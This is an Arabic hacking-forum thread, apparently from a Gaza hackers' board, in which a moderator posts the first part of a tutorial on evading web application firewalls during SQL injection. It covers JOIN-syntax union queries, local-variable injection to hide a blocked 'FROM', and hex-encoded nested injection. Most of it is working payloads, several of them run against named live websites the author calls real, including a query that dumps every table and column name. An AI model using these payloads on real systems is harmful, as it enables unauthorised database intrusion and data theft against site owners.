تذكرنــي
التسجيل التعليمات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة



اضافة رد

 
أدوات الموضوع انواع عرض الموضوع

رقم المشاركة : ( 1 )
الصورة الرمزية BlackRose
BlackRose
المشرف العام
BlackRose غير متواجد حالياً
 
رقم العضوية : 17559
تاريخ التسجيل : Feb 2011
مكان الإقامة :
عدد المشاركات : 3,182
عدد النقاط : 10
قوة التقييم :
Injector Boy
افتراضي 2- التقنيات المٌتقدِّمه النهائية في مجال كسر الحمايات المٌتعدِّية - الجٌزء الأول

كُتب : [ 08-09-2017 - 11:30 AM ]







التقنيات المٌتقدِّمه النهائية في مجال كسر الحمايات المٌتعدِّية بقواعد البيانات - الجٌزء الأول





الكثير والكثير من الحمايات في الوقت الراهن قد تطورة إلي التقنيات المٌتعدِّيه التي لا تستطيع التقنيات البسيطه القديمة مٌجابهتها لذا توجب على المٌختصيين تقديم تقنيات تتناسب وهذه الحمايات الجديده لذا سوف يشمل الثلاث أو أربع أجزء المشروحه التاليه هذه الشروحات القيمة والفريده من نوعها





التقنيات المشروحة بالجزء الأول




الباب الأول : أٌسلوب الحقن الفريد الـ Join Syntax -



الباب الثاني : إستخدام المٌتغيرات المؤقتة لتخطى الحمايات Local Variable Method .



الباب الثالث : أٌسلوب حقن نقطة الحقن الداخلي injection inside injection .





إلي الشروحات




الباب الأول : أٌسلوب الحقن الفريد الـ Join Syntax -




أٌسلوب الحقن الفريد الـ Join Syntax هو أٌسلوب حقن غير إعتيادي هدفٌهٌ هو ذات الهدف من الحقن النمطي الإعتيادي أي إختبار إستعلامات الحقن ولكنَّهٌ يختلف من حيثٌ الإمكانيات الخاصة به فهو نمط يستطيع تخطي بعض الحمايات العتيدة وهذا الحقن خطواتٌه على النحو التالي :




شروط الحقن


متي يمكن تحقق هذا الحقن أو بمعني أدق متي أستخدم هذا الأٌسلوب وأعرف أنهٌ الأسلوب الأمثل للحقن


عندما أقوم بحقن موقع وعند النقطه الخاصه بالاستغلال كالتالي






كود:
www.InjectorBoy.md/news.php?id=58' union select 1,2,3,4,5,6 -- -













ظهر الخطأ التالي الدال على عدم إمكانية الحقن






كود:
Error: (1054) Unknown column 'alias' in 'field list'







هنا فقط يتحقق شرط العمل لتقنية الـ Join Syntax




التكوين الهيكلي




أولاً : يكون الإستغلال كما هو على النمط الإعتيادي ثٌمً نقوم بإضافة مسافة بعد الكلمة select ثٌم ياليها كتابة رمز النجمه * ثٌم يلي ذلك كٌلهٌ مسافة أٌخرى بعد رمز النجمه ثٌم أخيراً كتابة الكلمة from بعدَهٌما وذلك على النحو التالي بالترقيم أدناه :




[1]


news.php?id=58' union select 1,2,3,4,5,6



[2]


news.php?id=58' union select * from 1,2,3,4,5,6





ثانياً : نتقل إلى هيكلة الأرقام الخاصة بالأعمدة فعندما نٌريد كتابة رقم ما لعمود من الأعمدة داخل الإستغلال يكون ذلك على النحو التالي :




1- نقوم بوضع قوسين هلاليَّين مٌغلَقين بعد كلمة from على النحو الأتي :




news.php?id=58' union select * from () .... I Love BALACKROSE





2- ثٌم نكتٌب داخل هذين القوسيين كلمة الـ select على النحو الأتي :




news.php?id=58' union select * from (select)




3- ثٌم نقوم بإضافة مسافة بعد الكلمة select داخل الأقواس ثٌم ياليها نكتٌب رقم العمود الأول لدينا على النحو الأتي :




news.php?id=58' union select * from (select 1)




4- ثٌم نعطي هذا العمود أي صاحِب الرقم واحد إسماً مٌستعاراً ويكون مكان ذلك الإسم المٌستعار بعد القوسين المٌغلقين مباشرةً دونَما أية فواصل, وليكون أي الإسم المٌستعار مكتوباً من الحروف الأبجدية الإنجليزية على النحو الأتي :




news.php?id=58' union select * from (select 1)a




5- ثم يالي الإسم المٌستعار a مسافة ثٌم نٌضيف الكلِمة join على النحو الأتي :




news.php?id=58' union select * from (select 1)a join




6- وهكذا دواليك مع باقى أرقام الأعمدة كافة فتكون الصورة النهائية لهذا النمط غير الإعتيادي على هذا النحو النهائي :






كود:
  InjectorBoy.md/news.php?id=58' union select * from (select 1)a join  (select+2)b join (select+version())c join (select+4)d join (select+5)e  join (select+6)f -- -






تجربه على موقع عام حي




كود:
http://www.gaspforair.org/gasp/gedc/artcl-new.php?ID=-76  union select * from (select 1)a join (select+2)b join  (select+version())c join (select+4)d join (select+5)e -- -

















إنتهي الشرح







الباب الثاني : إستخدام المٌتغيرات المؤقتة لتخطى الحمايات Local Variable Method .




هناك الكثير من الحمايات -WAF'S- التى تقوم على إعتراض وإستهداف بعض الكلِمات الأساسية ومنعها من العمل وهى من الرئِسيات - أي هذه الكلمات المٌستهدفة - التى تٌستخدم داخل الإستعلامات الرئيسية الخاصة بعمليات الإستغلال الكامل عند حقن قواعد البيانات , فعلى سبيل المثال لا الحصر الكلمة الرئيسية -FROM- المستخدمة داخل الإستعلامات بكثرة كما بالإستعلام التالى :




كود:
(sElect(@x)from(Select(@x:=0x00),(sElect(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x3a,table_name,0x3a,column_name))))x)





والتى قامت الحماية -WAF'S- بعمل إعتراض لها, والتى لا يمكن على إصرَها تمرير هذا الإستعلام بكامل هيئتهٌ لقاعِدة البيانات نظراً لهذا الحظر -


الأن لِنَقٌم بعمل محاكاه واقعية لعملية حقن يدوي لموقع حقيقى صٌمَّمَت حمايتهٌ لوقف أى عمليات مٌرتبِطة إستعلاماتها بالكلمة -FROM- ومحاولة تخطي هذه الحماية المٌعقدة بصورة بسيطة عن طريق إنشاء متغير محلي ! حسناً فالنٌنتابع .




الموقع الحقيقي المٌحَاكىَ





كود:
http://www.nubri.org/gallery.php?id=.1 /*!50000union*/ select 1-- -

















الأن نقوم بإضافة الأستعلام المٌشار لهٌ سابقاً في بداية الحديث مٌستبدلاً به أياً من الإعمدة المٌصابة وليكن العمود رقم خمسة على هذا النحو :






كود:
www.nubri.org/gallery.php?id=.1   /*!50000union*/ select  (sElect(@x)from(Select(@x:=0x00),(sElect(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x3a,table_name,0x3a,column_name))))x)--   -















كما يتبين من الصورة السابقة تم عمل إعتراض فى هيئة فوربيدن وذلك لكون الإستعلام مٌحتوي على الكلمة المٌعترضة -FROM- والذى أستطيع إثباتٌ أنها الهدف من هذا الإعتراض على النحو التالي -






كود:
www.nubri.org/gallery.php?id=.1 /*!50000union*/ select 1 from x -- -













حسناً الأن سوف نقوم بتخطي هذا المنع أو الإعتراض عن طريق إنشاء مٌتغير محلي لكي نتفادى أي إعتراض على أياً من كلمات الإستعلام الرئيسية من ضمنها الكلمة Form, ولكن أولاً فلنأخٌذ تصور عام عن فكرة المتغير المحلية بـ html وكيف نستطيع الإستفاده منه -










كما بالصورة أعلاه عند العدد المٌرقم بالصورة -1- هذا مايٌسمى بالمٌتغير وقد سميت هذا المتغير بألـ TITLE ويحتوي هذا المتغير على البيانات التى نٌريد طِباعتها داخل الصفحة بالأماكن التالية وعلى حسب الترقيم الأتي :


أولا: بالبار الرئيسى للصفحه وهذا الرقم -2-


ثانياً :بداخل الصفحة الرئيسية وهذا الرقم -3-


فبالإستعاضة هنا عن البيانات المراد طباعتها - أى بدلاً من الكتابة كل مرة أٌريد فيها إستخدام هذه البيانات بصورة يدوية - قٌمنا فقط بوضع الإسم المٌستعاض بهِ للمتغير والمٌحتوي البيانات المراد طباعتها بالأمكان المٌخصصةٌ لها ,وهذا من الناحية العملية أمر فى غاية الروعة كونهٌ يٌقلل من كثرة الكلمات والجٌمل داخل التصميم ويقلل أيضاً من العمليات الكتابية باليد ,وبالنَّظٌر للناتج النهائى المٌنتظر من المٌتغير المحلي سوف يكون كما بالصورة التاليه -










تم طباعة البيانات المٌراد طباعتها بأماكِنها المٌخصصة لها عن طريق عمل إستعاضة بالإسم .




وما سوف نقوم به تالياًً أثناء عملية الحقن اليدوي هو ذات الفكرة بعمل إستعاضة بالإسم عن البيانات التي سوف أقوم بحقنِها داخل أحد الأعمدة المٌصابة,أي إننا سوف نقوم بالألتفاف على الـ -waf- لتمرير القيم المحظورة بصورة غير مٌباشرة بعيداً عن الإدخال المباشر لهذه الإستعلامات والأكواد داخل الأعمدة المٌصابه .


ألخطوات المٌتبعة لعملية الحقن بالمٌتغير المحلي -




أولاً : الموقع ذو الحماية المٌستهدفة .






كود:
http://www.nubri.org/gallery.php?id=.1 /*!50000union*/ select 1-- -







ثانياً : نقوم بإضافة مٌتغير محلي قبل الإستعلام union select وبعد رقم المٌتغير صاحب الرقم واحد على النحو الأتي :




http://www.nubri.org/gallery.php?id=.1 and @:=(Statemeants) /*!50000union*/ select 1-- -






الـ and @:=() هو المٌتغير المحلي والـ Statemeants تعني مكان وضع الإستعلامات المٌستخدمة والرمز @ هو الإسم المٌستعاض به عن المٌتغير المحلي بصورة كٌلية -




ثالثاً : نقوم بإضافة الإسم المٌستعاض به عن المٌتغير المحلي وهو رمز الـ @ مكان رقم العمود المٌصابة على النحو الأتي :




http://www.nubri.org/gallery.php?id=.1 and @:=(Statemeants) /*!50000union*/ select @-- -





الأن لِنَقٌوم بتجرٌبِة هذا المٌتغير المحلي ومٌحاولة إستدعاء إصدار قاعدة البيانات مٌستخدمين الإستعلام version() بدل القيمة -Statemeants- على النحو التالي :






كود:
http://www.nubri.org/gallery.php?id=.1 and @:=(version()) /*!50000union*/ select @-- -












تم الأمر بنجاح ,حسناً الأن نقوم بإضافة الإستعلام الخاص بإستخراج كافة الجداول والمٌحتوي على الكلمات المحظورة والتي هي هٌنا على سبيل المِثال الـ -FROM- على هذا النحو الأتي :


مابين القوسين بدلاً من الـ -version()- نضيف الإستعلام التالي :




كود:
/*!50000SeleCT*/  /*!50000GrouP_ConCat(Table_name separator 0x3c62723e)*/From  Information_Schema.Tables where table_Schema=database()





كود:
www.nubri.org/gallery.php?id=.1  and @:=(/*!50000SeleCT*/ /*!50000GrouP_ConCat(Table_name separator  0x3c62723e)*/From Information_Schema.Tables where  table_Schema=database()) /*!50000union*/ select @-- -















إنتهي الشرح







الباب الثالث : أٌسلوب حقن نقطة الحقن الداخلي injection inside injection .






أٌسلوب ' حقن نقطة الحقن ' أو بمعنى أدق الحقن داخل الحقن من الأساليب القوية بمجال حقن قواعد البيانات :


مٌلاحظة هامة : الموقع التالى موقع إختباري مٌصمم لإختبار الإختراق, فهو ليس موقِعاً حيَّاً .




كود:
leettime.net/sqlninja.com





التكوين الهيكلي للتقنية




المرحلة الأولى :




بعد كتابة الإستغلال كاملاً للموقع وذلك بعد معرفة العدد الكٌلي للأعمدة وهم إثنين فقط :






كود:
leettime.net/sqlninja.com/tasks/routed_sqli_1.php?id=1' and 0 union select 1,2-- -












لم تظهر الأعمدة المٌصابة داخل صفحة الموقع وظهر الخطأ التالي -




Invalid Input parameter




المرحلة الثانية :




إختبار العمود المٌناسب لأٌسلوب الحقن داخل نقطة الحقن الداخلي





أولاً : نقوم بإختبار مكان الحقن إن أمكن بوضع الإستعلام التالى ' 0x27 ' بمكان الأعمدة كٌلها واحداً تلو الأخر على الترتيب, وعند ظهور خطأ مٌركب بأحدهِم يكون هو العمود المٌناسب لتفعيل الأٌسلوب داخلٌه :


[1]



id=1+union+select+0x27,2,3,4 -- No Thing


[2]



id=1+union+select+1,0x27,3,4 -- Error




بصورة عملية على الموقع :






كود:
leettime.net/sqlninja.com/tasks/routed_sqli_1.php?id=1' and 0 union select 0x27,2-- -



















كود:
leettime.net/sqlninja.com/tasks/routed_sqli_1.php?id=1' and 0 union select 1,0x27-- -

















ظهر خطأ بالعمود صاحب الرقم إثنين, مما دل على إنهٌ العمود المٌناسب لتفعيل الأٌسلوب داخِلَهٌ .




Error While Selection process : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1




المرحلة الثالثة :


نٌطبق الأٌسلوب






أولاً : نقوم بقص - cut - الإستعلام كاملاً من بداية الجٌزء الأول من بعد رقم المٌتغير عند إشارة التنصيص الفردية كومة (') إلى نهاية الجزء الأخير عند الإغلاق (-- -) على النحو التالي :




[1]






كود:
leettime.net/sqlninja.com/tasks/routed_sqli_1.php?id=1' and 0 union select 1,2-- -







[2]




كود:
 ' and 0 union select 1,2-- -







ثم نقوم بتشفيره كاملاً - أي الإستعلام المقصٌص - بالهيكس من هذا الموقع المٌخصص لذلك :




[3]




كود:
 www.waraxe.us/sql-char-encoder.html





الناتج :




كود:
0x2720616e64203020756e696f6e2073656c65637420312c322d2d202d





ثانياً :نقوم بوضعه كاملاً - أي الإستعلام المقصٌص مٌشفراًبالهيكس - بالعمود المٌناسب رقم إثنين :






كود:
  leettime.net/sqlninja.com/tasks/routed_sqli_1.php?id=1' and 0 union  select 1,0x2720616e64203020756e696f6e2073656c65637420312c322d2d202d--  -













كما نٌلاحظ بالصورة أعلاه ظهر رقم العمود المٌصاب داخل الصفحة وهو الرقم واحد


' Username is : 1 '


والدال بنفس الوقت على أن العمود المٌصاب للحقن هو العمود صاحب الرقم واحد .


حسناً : الآن لنكشف عن إصدار قاعدة البيانات بنفس الكيفية السابقة, لكن بوضع الإستعلام version() قبل عملية التشفير الكٌلية بمكان العمود صاحب الرقم واحد المٌصاب بالحقن -




[6]





كود:
' and 0 union select version(),2-- -





[7]






كود:
 0x2720616e64203020756e696f6e2073656c6563742076657273696f6e28292c322d2d202d







ثم نضع الإستعلام المٌشفر كاملاً مكان العمود صاحب الرقم إثنين المٌناسب لتفعيل الأٌسلوب داخِلَهٌ ' كما تم الكشف عنهٌ سابقاً بالـ 0x27 ' .




تنبيه هام : فلنٌفرق بين ذلك الأمر ! حتى لا يدخٌلنا أي إلتباس, فالعمود رقم إثنين هو العمود المٌناسب لتفعيل الأٌسلوب داخِلَهٌ - أي عمود الإختبار لهذه المسئلة - والعمود رقم واحد هو العمود المٌصاب الذى نضع به الإستعلامات الخاصة بالحقن وذلك قبل تشفيرها وهو الذي ظهر بالصفحة سابقاً - كـ عادة كٌل الأعمدة المٌصابة بأي موقع -






كود:
  leettime.net/sqlninja.com/tasks/routed_sqli_1.php?id=1' and 0 union  select  1,0x2720616e64203020756e696f6e2073656c6563742076657273696f6e28292c322d2d202d--  -













[9]


إصدار قاعدة البيانات : Username is : 5.5.52-cll







إنتهي الشرح






إلي هٌنا إنتهى الجزء الأول من الشرح إنتظرونا بالجزء الثاني وأساليب أكثر تشويقاً










توقيع : BlackRose

أن العقيدةِ خطً فاصل مهما كان المرء مستضعفاً فلا يضحى بعقيدتهِ

InjeCtorßфУ

[facebook.com/GHBlaCkRose]

رد مع إقتباس
الأعضاء الذين آرسلوا آعجاب لـ BlackRose على المشاركة المفيدة:
ww9k (08-09-2017)
بياناتي
 رقم المشاركة : ( 2 )
hacker005

رقم العضوية : 62656
تاريخ التسجيل : Mar 2015
مكان الإقامة :
عدد المشاركات : 1
عدد النقاط : 10

hacker005 غير متواجد حالياً

افتراضي

كُتب : [ 08-09-2017 - 01:20 PM ]


شرح مفصل و رااااااااائع جزاك الله خيرا استادنا


توقيع : hacker005



رد مع إقتباس
بياناتي
 رقم المشاركة : ( 3 )
ww9k

رقم العضوية : 29026
تاريخ التسجيل : Jun 2012
مكان الإقامة :
عدد المشاركات : 6
عدد النقاط : 10

ww9k غير متواجد حالياً

افتراضي

كُتب : [ 08-09-2017 - 04:20 PM ]


ممتاز جداً .. شكراً لك


توقيع : ww9k



رد مع إقتباس
الأعضاء الذين آرسلوا آعجاب لـ ww9k على المشاركة المفيدة:
BlackRose (08-09-2017)
بياناتي
 رقم المشاركة : ( 4 )
d4rk_saga

رقم العضوية : 65076
تاريخ التسجيل : Jun 2015
مكان الإقامة :
عدد المشاركات : 44
عدد النقاط : 10

d4rk_saga غير متواجد حالياً

افتراضي

كُتب : [ 08-11-2017 - 07:27 PM ]


جزاك الله خيرا


توقيع : d4rk_saga



رد مع إقتباس

اضافة رد

العلامات المرجعية

الكلمات الدلالية (Tags)
مجال, المٌتعدِّية, المٌتقدِّمه, الأول, التقنيات, الحمايات, الجٌزء, النهائية, كسر


يتصفح الموضوع حالياً : 2 (0 قرصان و 2 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
الإصدار الثالث من كتاب التقنيات الحصرية في مجال الـ sqli : التعتيم الكامل 2017 . BlackRose .:: SQL-injection , حقن قواعد بيانات ::. 8 11-01-2017 01:33 PM
1- التقنيات التبادٌلبة : Interchangeability Techniques BlackRose دورة أساتذة حقن قواعد البيانات المتقدمة لعام 2017 / 2018 1 08-06-2017 06:56 PM
إتش بي تطلق مجموعة تحسين أداء تقنية المعلومات للشركات ليث المشاهـد .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. 0 06-05-2011 11:35 PM
«المصرى اليوم» تنشر الأجزاء المحذوفة من المناهج الدراسية بالتعليم الأساسى. Marvel قسم اخبار العالم وقضايا الأمة الإسلامية 1 03-12-2011 09:58 PM
وثيقة تاريخية: الهولوكوست الصهيوني في فلسطين... قائمة كاملة بكل المجازر بين 1936-2006 قراصنة غزة .:: قسم قضية فلسطين ::. 0 03-07-2011 11:15 AM


جميع الأوقات بتوقيت GMT +2. الساعة الآن 02:54 PM.



أقسام المنتدى

الأقسام الإسلامية @ .:: القسم الإسلامي العام ::. @ .:: قسم القرآن الكريم وتجويده ::. @ .:: قسم الاناشيد والشريط الاسلامي ::. @ .:: سيرة و قصص الأنبياء و الصحابة ::. @ الأقسام العامة @ .:: قسم الساحة العامة ::. @ .:: قسم فـلـسـطــيــن ::. @ .:: قسم للتوعية الأمنية ::. @ .:: عالم البرامج الكاملة والنادرة ::. @ .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. @ .:: قسم عالم المحادثة ::. @ .:: قسم الأمن و الحماية | Security ::. @ ::. قسم حماية الاجهزة والايميلات .:: @ ::. قسم حمايه المواقع والسيرفرات.:: @ ::. قسم إختراق المواقع والأجهزة والبريد الإلكتروني | Hacker .:: @ ::. قسم إختراق المواقع والمنتديات .:: @ ::.قسم إختراق الأجهزه والبريد الاكتروني .:: @ .:: قسم الثغرات ::. @ .:: الركن الترفيهي ::. @ .:: قسم الصور ::. @ .:: ركن الأدارية ::. @ .:: قسم الشكاوي ولأقتراحات ::. @ خاص بشروحات الفيديو @ الأدوات , hack tools @ .:: قسم مساعدة الاعضاء ::. @ :: المواضيع المحذوفة :: @ قسم الانجازات @ .:: جديد قراصنة غزة ::. @ :: قسم استراحة الأعضاء :: @ :: YouTube :: @ .:: القسم التقني ::. @ :: عالمـ الكومبيوتر :: @ :: قسم الجوالات والاتصالات :: @ :: قسم التصميم والغرافيك :: @ خاص للادارة والمشرفين @ :: قسم خاص بالمبتدئين :: @ :: خاص بثغرات المتصفح :: @ :: خاص بشروحات الفيديو :: @ .:: الدورات المقدمة من المشرفين ::. @ :: مشآكل الكومبيوتر وحلولها :: @ .:: للنقاش الجاد ::. @ الملتقى الأدبي .. @ :: طلبات الإشراف :: @ :: كتب الحماية والاختراق security&hacking :: @ البحوث العلمية @ تعليم اللغات الأجنبية @ .:: كتب الكترونية منوعة ::. @ .:: القسم الدعوي ::. @ قسم الكتب الاسلامية @ قسم المواضيع المميزة @ :: قسم خاص بالتشفير :: @ قسم اخبار العالم وقضايا الأمة الإسلامية @ Local root @ دورة إحترآف إلـ Spam Email @ فلسطين , palestine @ .:: مدن وقرى فلسطين ::. @ .:: تاريخ فلسطين ::. @ .:: شهداء فلسطين ::. @ .:: مدينة القدس ::. @ .:: مدينة غزة ::. @ .:: لعروض التصاميم ::. @ .:: لدروس التصاميم ::. @ :: قسم اصدارات وانجازات الفريق :: @ .:: قسم قضية فلسطين ::. @ .:: قسم عروض الاستايلات :.. @ قسم اخبار وقضايا اليهود @ .:: قسم الهاكات وتطوير المنتديات ::. @ ::. قسم المسابقات والنشاطات .:: @ لوحة تحكم سي بانل , cPanel Management @ حماية قواعد البيانات mysql , sql @ لوحة تحكم , Plesk Management @ ادارة سيرفرات Linux @ .:: SQL-injection , حقن قواعد بيانات ::. @ :: قسم خاص بالمبتدئين :: @ .:: قسم الكتب الالكترونية E-BOOK ::. @ .:: قسم تفسير القران الكريم ::. @ قسم الدفاع عن النبي محمد والصحابة وآل البيت @ .:: قسم لغات البرمجة ::. @ قسم برمجة لغة Php , Html @ قسم برمجة لغة mysql , sql @ .:: القسم الرمضانى ::. @ جديد الشيخ نبيل العوضى @ حجب الخدمة , ddos attack @ قسم الاختراق المتقدم @ .:: حماية الاجهزة وطرق كشف التلغيم ::. @ .:: قسم حماية الايميلات :. @ قسم اختراق سيرفرات windows @ .:: دورة قراصنة غزة للتصميم ::. @ .::: أسرى فلسطين ::. @ مدرسة قراصنة غزة لحقن قواعد البيانات @ ::. قسم مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit .:: @ فريق :: Gaza HaCker Injector Team-GHI :: @ دورة أساتذة حقن قواعد البيانات المتقدمة لعام 2017 / 2018 @ GH-InjeCtor-Team @ .:: قسم الصلاة ثم الصلاة ::. @ وَحَرِّضِ الْمُؤْمِنِينَ @ قسم انظمة لينكس Linux, Unix @ قسم الالعاب الالكترونية @ قسم اختراق الشبكات السلكية واللاسلكية @ قسم الميكاترونكس (بناء الروبوتات) @ قسم الدورات المدفوعة @ قسم اختراق الاجهزة اللوحية @ دورات حقن قواعد البيانات للمٌبتدئين من الألف إلى الإحتراف @